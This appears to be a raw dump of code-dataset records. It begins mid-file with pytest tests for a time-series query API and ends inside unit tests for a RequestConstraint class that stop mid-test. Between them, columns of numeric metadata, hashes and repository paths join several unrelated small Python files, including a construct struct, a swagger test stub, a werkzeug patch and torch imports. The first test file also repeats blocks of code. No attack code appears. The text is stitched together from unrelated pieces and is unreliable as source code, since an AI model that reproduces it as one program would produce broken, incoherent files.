'attrName': attr_name,
'types': expected_types
}
obtained = r.json()
assert obtained == expected
def test_NTNE1A_type(reporter_dataset):
# Query
query_params = {
'type': entity_type
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 200, r.text
expected_temperatures = list(range(4))
expected_index = [
'1970-01-{:02}T00:00:00.000'.format(i+1) for i in expected_temperatures
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': expected_temperatures
},
{
'entityId': 'Room2',
'index': expected_index,
'values': expected_temperatures
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types
}
obtained = r.json()
assert obtained == expected
def test_NTNE1A_one_entity(reporter_dataset):
# Query
query_params = {
'id': entity_id
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 200, r.text
obtained_data = r.json()
assert isinstance(obtained_data, dict)
expected_temperatures = list(range(4))
expected_index = [
'1970-01-{:02}T00:00:00.000'.format(i+1) for i in expected_temperatures
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': expected_temperatures
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types
}
obtained = r.json()
assert obtained == expected
def test_1TNENA_some_entities(reporter_dataset):
# Query
# Assert Results
entity_ids = "Room1, Room2"
query_params = {
'id': entity_ids
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 200, r.text
obtained_data = r.json()
assert isinstance(obtained_data, dict)
expected_temperatures = list(range(4))
expected_index = [
'1970-01-{:02}T00:00:00.000'.format(i+1) for i in expected_temperatures
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': expected_temperatures
},
{
'entityId': 'Room2',
'index': expected_index,
'values': expected_temperatures
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types
}
obtained = r.json()
assert obtained == expected
def test_NTNE1A_values_defaults(reporter_dataset):
# Query
query_params = {
'id': 'Room1,Room2,RoomNotValid', # -> validates to Room1,Room2.
}
r = requests.get(query_url(values=True), params=query_params)
assert r.status_code == 200, r.text
# Assert Results
expected_temperatures = list(range(4))
expected_index = [
'1970-01-{:02}T00:00:00.000'.format(i+1) for i in expected_temperatures
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': expected_temperatures
},
{
'entityId': 'Room2',
'index': expected_index,
'values': expected_temperatures
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
#'values': expected_entities,
#'attrName': attr_name,
'values': expected_types
#'types': expected_types
}
obtained = r.json()
assert obtained == expected
def test_weird_ids(reporter_dataset):
"""
Invalid ids are ignored (provided at least one is valid to avoid 404).
Empty values are ignored.
Order of ids is preserved in response (e.g., Room1 first, Room0 later)
"""
query_params = {
'id': 'Room1,RoomNotValid,Room2,', # -> validates to Room2,Room1.
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 200, r.text
expected_temperatures = list(range(n_days))
expected_index = [
'1970-01-{:02}T00:00:00.000'.format(i+1) for i in expected_temperatures
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': expected_temperatures
},
{
'entityId': 'Room2',
'index': expected_index,
'values': expected_temperatures
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types
}
obtained = r.json()
assert obtained == expected
def test_NTNE1A_fromDate_toDate(reporter_dataset):
# Query
query_params = {
'types': 'entity_type',
'fromDate': "1970-01-01T00:00:00",
'toDate': "1970-01-04T00:00:00"
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 200, r.text
obtained = r.json()
assert isinstance(obtained, dict)
expected_temperatures = list(range(4))
expected_index = [
'1970-01-{:02}T00:00:00.000'.format(i+1) for i in expected_temperatures
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': expected_temperatures
},
{
'entityId': 'Room2',
'index': expected_index,
'values': expected_temperatures
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types,
}
obtained = r.json()
assert obtained == expected
def test_NTNE1A_fromDate_toDate_with_quotes(reporter_dataset):
# Query
query_params = {
'types': 'entity_type',
'fromDate': "1970-01-01T00:00:00",
'toDate': "1970-01-04T00:00:00"
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 200, r.text
obtained = r.json()
assert isinstance(obtained, dict)
expected_temperatures = list(range(4))
expected_index = [
'1970-01-{:02}T00:00:00.000'.format(i+1) for i in expected_temperatures
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': expected_temperatures
},
{
'entityId': 'Room2',
'index': expected_index,
'values': expected_temperatures
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types,
}
obtained = r.json()
assert obtained == expected
def test_NTNE1A_limit(reporter_dataset):
# Query
query_params = {
'limit': 10
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 200, r.text
obtained = r.json()
assert isinstance(obtained, dict)
expected_temperatures = list(range(4))
expected_index = [
'1970-01-{:02}T00:00:00.000'.format(i+1) for i in expected_temperatures
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': expected_temperatures
},
{
'entityId': 'Room2',
'index': expected_index,
'values': expected_temperatures
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types,
}
obtained = r.json()
assert obtained == expected
def test_NTNE1A_combined(reporter_dataset):
# Query
query_params = {
'type': entity_type,
'fromDate': "1970-01-01T00:00:00",
'toDate': "1970-01-03T00:00:00",
'limit': 10,
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 200, r.text
obtained = r.json()
assert isinstance(obtained, dict)
expected_temperatures = list(range(3))
expected_index = [
'1970-01-{:02}T00:00:00.000'.format(i+1) for i in expected_temperatures
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': expected_temperatures
},
{
'entityId': 'Room2',
'index': expected_index,
'values': expected_temperatures
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types,
}
obtained = r.json()
assert obtained == expected
@pytest.mark.parametrize("aggr_period, exp_index, ins_period", [
("day", ['1970-01-01T00:00:00.000',
'1970-01-02T00:00:00.000',
'1970-01-03T00:00:00.000'], "hour"),
("hour", ['1970-01-01T00:00:00.000',
'1970-01-01T01:00:00.000',
'1970-01-01T02:00:00.000'], "minute"),
("minute", ['1970-01-01T00:00:00.000',
'1970-01-01T00:01:00.000',
'1970-01-01T00:02:00.000'], "second"),
])
def test_NTNE1A_aggrPeriod(translator, aggr_period, exp_index, ins_period):
# Custom index to test aggrPeriod
for i in exp_index:
base = datetime.strptime(i, "%Y-%m-%dT%H:%M:%S.%f")
insert_test_data(translator,
[entity_type],
index_size=5,
index_base=base,
index_period=ins_period)
# aggrPeriod needs aggrMethod
query_params = {
'aggrPeriod': aggr_period,
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 400, r.text
# Check aggregation with aggrPeriod
query_params = {
'attrs': 'temperature',
'aggrMethod': 'sum',
'aggrPeriod': aggr_period,
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 200, r.text
expected_temperatures = 0 + 1 + 2 + 3 + 4
# Assert
obtained = r.json()
expected_entities = [
{
'entityId': 'Room0',
'index': exp_index,
'values': [expected_temperatures, expected_temperatures, expected_temperatures]
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types,
}
obtained = r.json()
assert obtained == expected
def test_not_found():
query_params = {
'id': 'RoomNotValid'
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 404, r.text
assert r.json() == {
"error": "Not Found",
"description": "No records were found for such query."
}
def test_NTNE1A_aggrScope(reporter_dataset):
# Notify users when not yet implemented
query_params = {
'aggrMethod': 'avg',
'aggrScope': 'global',
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 501, r.text
def test_aggregation_is_per_instance(translator):
t = 'Room'
insert_test_data(translator, [t], entity_id='Room1', index_size=3)
query_params = {
'attrs': 'temperature',
'id': 'Room1',
'aggrMethod': 'sum'
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 200, r.text
obtained = r.json()
assert isinstance(obtained, dict)
expected_temperatures = list(range(4))
expected_index = [
'',''
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': [sum(range(3))]
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types,
}
obtained = r.json()
assert obtained == expected
# Index array in the response is the used fromDate and toDate
query_params = {
'attrs': 'temperature',
'id': 'Room1',
'aggrMethod': 'max',
'fromDate': datetime(1970, 1, 1).isoformat(),
'toDate': datetime(1970, 1, 2).isoformat(),
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 200, r.text
obtained = r.json()
assert isinstance(obtained, dict)
expected_temperatures = list(range(2))
expected_index = [
'1970-01-{:02}T00:00:00'.format(i+1) for i in expected_temperatures
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': [1]
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types,
}
obtained = r.json()
assert obtained == expected
query_params = {
'attrs': 'temperature',
'id': 'Room1',
'aggrMethod': 'avg'
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 200, r.text
obtained = r.json()
assert isinstance(obtained, dict)
expected_temperatures = list(range(4))
expected_index = [
'',''
]
obtained = r.json()
assert isinstance(obtained, dict)
expected_temperatures = list(range(4))
expected_index = [
'',''
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': [1]
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types,
}
obtained = r.json()
assert obtained == expected
| 25.622642 | 98 | 0.555044 | 1,658 | 16,296 | 5.255127 | 0.106152 | 0.11018 | 0.077126 | 0.060599 | 0.800069 | 0.778607 | 0.760932 | 0.745782 | 0.725123 | 0.725123 | 0 | 0.052717 | 0.320201 | 16,296 | 635 | 99 | 25.662992 | 0.733797 | 0.036267 | 0 | 0.561818 | 0 | 0 | 0.141826 | 0.035888 | 0 | 0 | 0 | 0 | 0.076364 | 1 | 0.029091 | false | 0 | 0.009091 | 0 | 0.04 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2b19bd5667f59566f94bfa815f4cad9823f98d75 | 139 | py | Python | compiled/construct/zlib_with_header_78.py | smarek/ci_targets | c5edee7b0901fd8e7f75f85245ea4209b38e0cb3 | [
"MIT"
] | 4 | 2017-04-08T12:55:11.000Z | 2020-12-05T21:09:31.000Z | compiled/construct/zlib_with_header_78.py | smarek/ci_targets | c5edee7b0901fd8e7f75f85245ea4209b38e0cb3 | [
"MIT"
] | 7 | 2018-04-23T01:30:33.000Z | 2020-10-30T23:56:14.000Z | compiled/construct/zlib_with_header_78.py | smarek/ci_targets | c5edee7b0901fd8e7f75f85245ea4209b38e0cb3 | [
"MIT"
] | 6 | 2017-04-08T11:41:14.000Z | 2020-10-30T22:47:31.000Z | from construct import *
from construct.lib import *
zlib_with_header_78 = Struct(
'data' / GreedyBytes,
)
_schema = zlib_with_header_78
| 15.444444 | 29 | 0.769784 | 19 | 139 | 5.263158 | 0.631579 | 0.26 | 0.28 | 0.32 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033898 | 0.151079 | 139 | 8 | 30 | 17.375 | 0.813559 | 0 | 0 | 0 | 0 | 0 | 0.028777 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
9934002210430cadb6d5db7ff0b033d93a53c2ae | 1,138 | py | Python | test/test_all_of_instance_permission_set_response_byond_rights.py | ike709/tgs4-api-pyclient | 97918cfe614cc4ef06ef2485efff163417a8cd44 | [
"MIT"
] | null | null | null | test/test_all_of_instance_permission_set_response_byond_rights.py | ike709/tgs4-api-pyclient | 97918cfe614cc4ef06ef2485efff163417a8cd44 | [
"MIT"
] | null | null | null | test/test_all_of_instance_permission_set_response_byond_rights.py | ike709/tgs4-api-pyclient | 97918cfe614cc4ef06ef2485efff163417a8cd44 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
TGS API
A production scale tool for BYOND server management # noqa: E501
OpenAPI spec version: 9.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.all_of_instance_permission_set_response_byond_rights import AllOfInstancePermissionSetResponseByondRights # noqa: E501
from swagger_client.rest import ApiException
class TestAllOfInstancePermissionSetResponseByondRights(unittest.TestCase):
"""AllOfInstancePermissionSetResponseByondRights unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testAllOfInstancePermissionSetResponseByondRights(self):
"""Test AllOfInstancePermissionSetResponseByondRights"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.all_of_instance_permission_set_response_byond_rights.AllOfInstancePermissionSetResponseByondRights() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 28.45 | 154 | 0.77065 | 114 | 1,138 | 7.421053 | 0.596491 | 0.061466 | 0.040189 | 0.052009 | 0.1513 | 0.1513 | 0.1513 | 0.1513 | 0.1513 | 0.1513 | 0 | 0.013684 | 0.165202 | 1,138 | 39 | 155 | 29.179487 | 0.876842 | 0.458699 | 0 | 0.214286 | 1 | 0 | 0.013937 | 0 | 0 | 0 | 0 | 0.025641 | 0 | 1 | 0.214286 | false | 0.214286 | 0.357143 | 0 | 0.642857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
99a222dfd65ae2b87c29e4d51739d54a2668e16f | 211 | py | Python | backend/grant/patches.py | DSBUGAY2/zcash-grant-system | 729b9edda13bd1eeb3f445d889264230c6470d7e | [
"MIT"
] | 8 | 2019-06-03T16:29:49.000Z | 2021-05-11T20:38:36.000Z | backend/grant/patches.py | DSBUGAY2/zcash-grant-system | 729b9edda13bd1eeb3f445d889264230c6470d7e | [
"MIT"
] | 342 | 2019-01-15T19:13:58.000Z | 2020-03-24T16:38:13.000Z | backend/grant/patches.py | DSBUGAY2/zcash-grant-system | 729b9edda13bd1eeb3f445d889264230c6470d7e | [
"MIT"
] | 5 | 2019-02-15T09:06:47.000Z | 2022-01-24T21:38:41.000Z | from werkzeug import http, wrappers
from grant.werkzeug_http_fork import dump_cookie
def patch_werkzeug_set_samesite():
http.dump_cookie = dump_cookie
wrappers.base_response.dump_cookie = dump_cookie
| 23.444444 | 52 | 0.819905 | 30 | 211 | 5.4 | 0.5 | 0.308642 | 0.17284 | 0.246914 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132701 | 211 | 8 | 53 | 26.375 | 0.885246 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
51029f914659a3ab866b75e22b8fb9d023ded3d8 | 372 | py | Python | torch/ao/quantization/__init__.py | svecjan/pytorch | 09d221e8d439bc748b162c028f7eece202688adf | [
"Intel"
] | 3 | 2020-06-11T04:57:15.000Z | 2021-09-15T22:28:52.000Z | torch/ao/quantization/__init__.py | svecjan/pytorch | 09d221e8d439bc748b162c028f7eece202688adf | [
"Intel"
] | 1 | 2021-04-22T18:37:42.000Z | 2021-04-28T00:53:25.000Z | torch/ao/quantization/__init__.py | svecjan/pytorch | 09d221e8d439bc748b162c028f7eece202688adf | [
"Intel"
] | null | null | null | from .fake_quantize import * # noqa: F403
# TODO(future PR): fix the typo, should be `__all__`
_all__ = [
# FakeQuantize (for qat)
'default_fake_quant', 'default_weight_fake_quant',
'default_symmetric_fixed_qparams_fake_quant',
'default_affine_fixed_qparams_fake_quant',
'default_per_channel_weight_fake_quant',
'default_histogram_fake_quant',
]
| 31 | 54 | 0.755376 | 48 | 372 | 5.208333 | 0.583333 | 0.216 | 0.32 | 0.176 | 0.224 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009494 | 0.150538 | 372 | 11 | 55 | 33.818182 | 0.781646 | 0.225806 | 0 | 0 | 0 | 0 | 0.665493 | 0.602113 | 0 | 0 | 0 | 0.090909 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5ad986fc8d5cdda5aa2288bf1c0c2ec4e02308c1 | 142 | py | Python | jade2/deep_learning/torch/__init__.py | RosettaCommons/jade2 | 40affc7c4e0f1f6ee07030e72de284e3484946e7 | [
"BSD-3-Clause"
] | 1 | 2019-12-23T21:52:23.000Z | 2019-12-23T21:52:23.000Z | jade2/deep_learning/torch/__init__.py | RosettaCommons/jade2 | 40affc7c4e0f1f6ee07030e72de284e3484946e7 | [
"BSD-3-Clause"
] | null | null | null | jade2/deep_learning/torch/__init__.py | RosettaCommons/jade2 | 40affc7c4e0f1f6ee07030e72de284e3484946e7 | [
"BSD-3-Clause"
] | 1 | 2021-01-28T18:59:03.000Z | 2021-01-28T18:59:03.000Z | from .layers import *
from .modules import *
from .tensor_creation import *
from .training import *
from .util import *
from .metrics import * | 23.666667 | 30 | 0.753521 | 19 | 142 | 5.578947 | 0.473684 | 0.471698 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.161972 | 142 | 6 | 31 | 23.666667 | 0.890756 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
51c4bdf11005df47125b64ad2de25f2f362c84c2 | 45 | py | Python | tests/files/fail_3.py | NathanVaughn/pyleft | 3e2c0bbf84416afa4ed653a65f3fd37e589c7efa | [
"MIT"
] | null | null | null | tests/files/fail_3.py | NathanVaughn/pyleft | 3e2c0bbf84416afa4ed653a65f3fd37e589c7efa | [
"MIT"
] | 2 | 2021-12-09T00:20:21.000Z | 2022-01-01T23:26:17.000Z | tests/files/fail_3.py | NathanVaughn/pyleft | 3e2c0bbf84416afa4ed653a65f3fd37e589c7efa | [
"MIT"
] | null | null | null | class Car:
def drive(self):
pass
| 11.25 | 20 | 0.533333 | 6 | 45 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.377778 | 45 | 3 | 21 | 15 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0.333333 | 0 | 0 | 0.666667 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
cfb2a0157f30834779e68730d5f0a41146770b7b | 11,175 | py | Python | awips/test/dafTests/testRequestConstraint.py | mjames-upc/python-awips | e2b05f5587b02761df3b6dd5c6ee1f196bd5f11c | [
"BSD-3-Clause"
] | null | null | null | awips/test/dafTests/testRequestConstraint.py | mjames-upc/python-awips | e2b05f5587b02761df3b6dd5c6ee1f196bd5f11c | [
"BSD-3-Clause"
] | null | null | null | awips/test/dafTests/testRequestConstraint.py | mjames-upc/python-awips | e2b05f5587b02761df3b6dd5c6ee1f196bd5f11c | [
"BSD-3-Clause"
] | null | null | null | from dynamicserialize.dstypes.com.raytheon.uf.common.dataquery.requests import RequestConstraint
import unittest
#
# Unit tests for Python implementation of RequestConstraint
#
# SOFTWARE HISTORY
#
# Date Ticket# Engineer Description
# ------------ ---------- ----------- --------------------------
# 07/22/16 2416 tgurney Initial creation
#
#
class RequestConstraintTestCase(unittest.TestCase):
def _newRequestConstraint(self, constraintType, constraintValue):
constraint = RequestConstraint()
constraint.constraintType = constraintType
constraint.constraintValue = constraintValue
return constraint
def testEvaluateEquals(self):
new = RequestConstraint.new
self.assertTrue(new('=', 3).evaluate(3))
self.assertTrue(new('=', 3).evaluate('3'))
self.assertTrue(new('=', '3').evaluate(3))
self.assertTrue(new('=', 12345).evaluate(12345))
self.assertTrue(new('=', 'a').evaluate('a'))
self.assertTrue(new('=', 'a').evaluate(u'a'))
self.assertTrue(new('=', 1.0001).evaluate(2.0 - 0.999999))
self.assertTrue(new('=', 1.00001).evaluate(1))
self.assertFalse(new('=', 'a').evaluate(['a']))
self.assertFalse(new('=', 'a').evaluate(['b']))
self.assertFalse(new('=', 3).evaluate(4))
self.assertFalse(new('=', 4).evaluate(3))
self.assertFalse(new('=', 'a').evaluate('z'))
def testEvaluateNotEquals(self):
new = RequestConstraint.new
self.assertTrue(new('!=', 'a').evaluate(['a']))
self.assertTrue(new('!=', 'a').evaluate(['b']))
self.assertTrue(new('!=', 3).evaluate(4))
self.assertTrue(new('!=', 4).evaluate(3))
self.assertTrue(new('!=', 'a').evaluate('z'))
self.assertFalse(new('!=', 3).evaluate('3'))
self.assertFalse(new('!=', '3').evaluate(3))
self.assertFalse(new('!=', 3).evaluate(3))
self.assertFalse(new('!=', 12345).evaluate(12345))
self.assertFalse(new('!=', 'a').evaluate('a'))
self.assertFalse(new('!=', 'a').evaluate(u'a'))
self.assertFalse(new('!=', 1.0001).evaluate(2.0 - 0.9999))
def testEvaluateGreaterThan(self):
new = RequestConstraint.new
self.assertTrue(new('>', 1.0001).evaluate(1.0002))
self.assertTrue(new('>', 'a').evaluate('b'))
self.assertTrue(new('>', 3).evaluate(4))
self.assertFalse(new('>', 20).evaluate(3))
self.assertFalse(new('>', 12345).evaluate(12345))
self.assertFalse(new('>', 'a').evaluate('a'))
self.assertFalse(new('>', 'z').evaluate('a'))
self.assertFalse(new('>', 4).evaluate(3))
def testEvaluateGreaterThanEquals(self):
new = RequestConstraint.new
self.assertTrue(new('>=', 3).evaluate(3))
self.assertTrue(new('>=', 12345).evaluate(12345))
self.assertTrue(new('>=', 'a').evaluate('a'))
self.assertTrue(new('>=', 1.0001).evaluate(1.0002))
self.assertTrue(new('>=', 'a').evaluate('b'))
self.assertTrue(new('>=', 3).evaluate(20))
self.assertFalse(new('>=', 1.0001).evaluate(1.0))
self.assertFalse(new('>=', 'z').evaluate('a'))
self.assertFalse(new('>=', 40).evaluate(3))
def testEvaluateLessThan(self):
new = RequestConstraint.new
self.assertTrue(new('<', 'z').evaluate('a'))
self.assertTrue(new('<', 30).evaluate(4))
self.assertFalse(new('<', 3).evaluate(3))
self.assertFalse(new('<', 12345).evaluate(12345))
self.assertFalse(new('<', 'a').evaluate('a'))
self.assertFalse(new('<', 1.0001).evaluate(1.0002))
self.assertFalse(new('<', 'a').evaluate('b'))
self.assertFalse(new('<', 3).evaluate(40))
def testEvaluateLessThanEquals(self):
new = RequestConstraint.new
self.assertTrue(new('<=', 'z').evaluate('a'))
self.assertTrue(new('<=', 20).evaluate(3))
self.assertTrue(new('<=', 3).evaluate(3))
self.assertTrue(new('<=', 12345).evaluate(12345))
self.assertTrue(new('<=', 'a').evaluate('a'))
self.assertFalse(new('<=', 1.0001).evaluate(1.0002))
self.assertFalse(new('<=', 'a').evaluate('b'))
self.assertFalse(new('<=', 4).evaluate(30))
def testEvaluateIsNull(self):
new = RequestConstraint.new
self.assertTrue(new('=', None).evaluate(None))
self.assertTrue(new('=', None).evaluate('null'))
self.assertFalse(new('=', None).evaluate(()))
self.assertFalse(new('=', None).evaluate(0))
self.assertFalse(new('=', None).evaluate(False))
def testEvaluateIsNotNull(self):
new = RequestConstraint.new
self.assertTrue(new('!=', None).evaluate(()))
self.assertTrue(new('!=', None).evaluate(0))
self.assertTrue(new('!=', None).evaluate(False))
self.assertFalse(new('!=', None).evaluate(None))
self.assertFalse(new('!=', None).evaluate('null'))
def testEvaluateIn(self):
new = RequestConstraint.new
self.assertTrue(new('in', [3]).evaluate(3))
self.assertTrue(new('in', ['a', 'b', 3]).evaluate(3))
self.assertTrue(new('in', 'a').evaluate('a'))
self.assertTrue(new('in', [3, 4, 5]).evaluate('5'))
self.assertTrue(new('in', [1.0001, 2, 3]).evaluate(2.0 - 0.9999))
self.assertFalse(new('in', ['a', 'b', 'c']).evaluate('d'))
self.assertFalse(new('in', 'a').evaluate('b'))
def testEvaluateNotIn(self):
new = RequestConstraint.new
self.assertTrue(new('not in', ['a', 'b', 'c']).evaluate('d'))
self.assertTrue(new('not in', [3, 4, 5]).evaluate(6))
self.assertTrue(new('not in', 'a').evaluate('b'))
self.assertFalse(new('not in', [3]).evaluate(3))
self.assertFalse(new('not in', ['a', 'b', 3]).evaluate(3))
self.assertFalse(new('not in', 'a').evaluate('a'))
self.assertFalse(new('not in', [1.0001, 2, 3]).evaluate(2.0 - 0.9999))
def testEvaluateLike(self):
# cannot make "like" with RequestConstraint.new()
new = self._newRequestConstraint
self.assertTrue(new('LIKE', 'a').evaluate('a'))
self.assertTrue(new('LIKE', 'a%').evaluate('a'))
self.assertTrue(new('LIKE', 'a%').evaluate('abcd'))
self.assertTrue(new('LIKE', '%a').evaluate('a'))
self.assertTrue(new('LIKE', '%a').evaluate('bcda'))
self.assertTrue(new('LIKE', '%').evaluate(''))
self.assertTrue(new('LIKE', '%').evaluate('anything'))
self.assertTrue(new('LIKE', 'a%d').evaluate('ad'))
self.assertTrue(new('LIKE', 'a%d').evaluate('abcd'))
self.assertTrue(new('LIKE', 'aa.()!{[]^%$').evaluate('aa.()!{[]^zzz$'))
self.assertTrue(new('LIKE', 'a__d%').evaluate('abcdefg'))
self.assertFalse(new('LIKE', 'a%').evaluate('b'))
self.assertFalse(new('LIKE', 'a%').evaluate('ba'))
self.assertFalse(new('LIKE', '%a').evaluate('b'))
self.assertFalse(new('LIKE', '%a').evaluate('ab'))
self.assertFalse(new('LIKE', 'a%').evaluate('A'))
self.assertFalse(new('LIKE', 'A%').evaluate('a'))
self.assertFalse(new('LIKE', 'a%d').evaluate('da'))
self.assertFalse(new('LIKE', 'a__d%').evaluate('abccdefg'))
self.assertFalse(new('LIKE', '....').evaluate('aaaa'))
self.assertFalse(new('LIKE', '.*').evaluate('anything'))
def testEvaluateILike(self):
# cannot make "ilike" with RequestConstraint.new()
new = self._newRequestConstraint
self.assertTrue(new('ILIKE', 'a').evaluate('a'))
self.assertTrue(new('ILIKE', 'a%').evaluate('a'))
self.assertTrue(new('ILIKE', 'a%').evaluate('abcd'))
self.assertTrue(new('ILIKE', '%a').evaluate('a'))
self.assertTrue(new('ILIKE', '%a').evaluate('bcda'))
self.assertTrue(new('ILIKE', '%').evaluate(''))
self.assertTrue(new('ILIKE', '%').evaluate('anything'))
self.assertTrue(new('ILIKE', 'a%d').evaluate('ad'))
self.assertTrue(new('ILIKE', 'a%d').evaluate('abcd'))
self.assertTrue(new('ILIKE', 'a').evaluate('A'))
self.assertTrue(new('ILIKE', 'a%').evaluate('A'))
self.assertTrue(new('ILIKE', 'a%').evaluate('ABCD'))
self.assertTrue(new('ILIKE', '%a').evaluate('A'))
self.assertTrue(new('ILIKE', '%a').evaluate('BCDA'))
self.assertTrue(new('ILIKE', '%').evaluate(''))
self.assertTrue(new('ILIKE', '%').evaluate('anything'))
self.assertTrue(new('ILIKE', 'a%d').evaluate('AD'))
self.assertTrue(new('ILIKE', 'a%d').evaluate('ABCD'))
self.assertTrue(new('ILIKE', 'A').evaluate('a'))
self.assertTrue(new('ILIKE', 'A%').evaluate('a'))
self.assertTrue(new('ILIKE', 'A%').evaluate('abcd'))
self.assertTrue(new('ILIKE', '%A').evaluate('a'))
self.assertTrue(new('ILIKE', '%A').evaluate('bcda'))
self.assertTrue(new('ILIKE', '%').evaluate(''))
